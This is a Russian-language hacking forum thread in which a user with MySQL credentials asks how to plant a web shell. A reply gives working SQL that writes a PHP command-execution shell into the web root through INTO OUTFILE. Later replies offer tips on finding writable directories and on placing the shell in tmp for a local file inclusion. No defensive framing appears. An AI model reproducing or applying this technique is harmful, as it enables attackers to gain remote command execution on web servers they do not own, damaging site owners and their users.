Shell через sql

Discussion in 'Уязвимости' started by Ambient_man, 5 Nov 2006.

Thread Status:
Not open for further replies.
  1. Ambient_man

    Ambient_man New Member

    Joined:
    14 Oct 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Знающие подскажите , реально ли это сделать.

    Есть доступ к mysql , то есть логин и пасс для доступа.

    Как залить шелл ? и реально ли это ?

    Если можно с примерами ...
     
  2. spheere

    spheere Member

    Joined:
    24 May 2006
    Messages:
    13
    Likes Received:
    7
    Reputations:
    4
    CREATE TABLE `config` (`script` TEXT NOT NULL) COMMENT = 'config';
    INSERT INTO `config` ( `script` ) VALUES ('<? passthru($_GET['sh']) ?>');
    SELECT script FROM `config` INTO OUTFILE '/home/www/html/config.php';
    DROP TABLE `config`;

    Тока эта, поменяй название таблицы и имя файла...
    Ато можно ненароком подменить настоящие.
     
    #2 spheere, 5 Nov 2006
    Last edited: 5 Nov 2006
  3. Ambient_man

    Ambient_man New Member

    Joined:
    14 Oct 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0

    #1 - Can't create/write to file '..\..\..\www\co2nfig.php' (Errcode: 2)
     
  4. spheere

    spheere Member

    Joined:
    24 May 2006
    Messages:
    13
    Likes Received:
    7
    Reputations:
    4
    Найди папку справами на запись, например Uploads...
    И путь подбери, вобщем экспериментируй.
     
  5. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    92
    Likes Received:
    38
    Reputations:
    21
    Или если есть локальный инклюд, лей шелл в tmp.
     
  6. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    эта тема не раз обсуждалась.поиск по словам "into , outfile"
     
Thread Status:
Not open for further replies.